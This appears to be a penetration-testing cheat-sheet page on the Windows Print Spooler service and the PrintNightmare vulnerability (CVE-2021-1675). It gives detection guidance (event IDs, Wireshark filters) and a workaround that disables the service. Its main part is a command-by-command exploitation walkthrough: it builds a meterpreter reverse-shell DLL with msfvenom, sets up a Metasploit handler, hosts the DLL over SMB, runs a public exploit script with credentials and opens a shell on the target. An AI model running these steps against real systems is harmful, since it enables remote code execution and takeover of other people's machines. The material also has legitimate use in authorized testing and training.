Exploit Notes

Windows Print Spooler Service

Last modified: 2023-08-03

Printer Windows

A service that is running on each computer that participates in the Print Services system. It uses any port between 49152 and 65535. It may be vulnerable to the PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

Investigation

# Check if the Print Spooler service is running
Get-Service -Name Spooler

Detection

Services

  1. Open Services.
  2. We can find the Print Spooler on the Right Pane.
  3. Double-click on it and see the details.

Malicious DLL Location

C:\Windows\System32\spool\drivers\x64\3\

Event Viewer

Open Event Viewer, and find event logs in the following directory in the left pane.
If you want to filter by Event ID, use "Filter Current Log" in the right pane.

  • Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808)
  • Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, 811)
  • Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017)
  • Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3, 11, 23, 26)
  • Windows Logs/System (Event ID: 7031)

Packet Analysis (Wireshark)

Open .pcap file with Wireshark.

Filter packets with "smb" or "smb2".


PrintNightmare

This is security vulnerability to remote code execution in print spooler service.
It requires authentication (username/password).

1. Clone the Repository

git clone https://github.com/cube0x0/CVE-2021-1675

2. Create a Malicious DLL using Msfvenom

mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll

3. Start Metasploit and Reverse TCP

msfconsole

msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs

4. Host the Malicious DLL

impacket-smbserver share ./share/  -smb2support

5. Examine the Target Fits the Criteria to Exploit It

impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

6. Run the Exploit

cd CVE-2021-1675
python3 CVE-2021-1675.py Domain.Controller.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'

Now we should get a target shell in msfconsole.

7. Interact with Target System

Enter the target system via msfconsole.

msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami

Workarounds

# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

References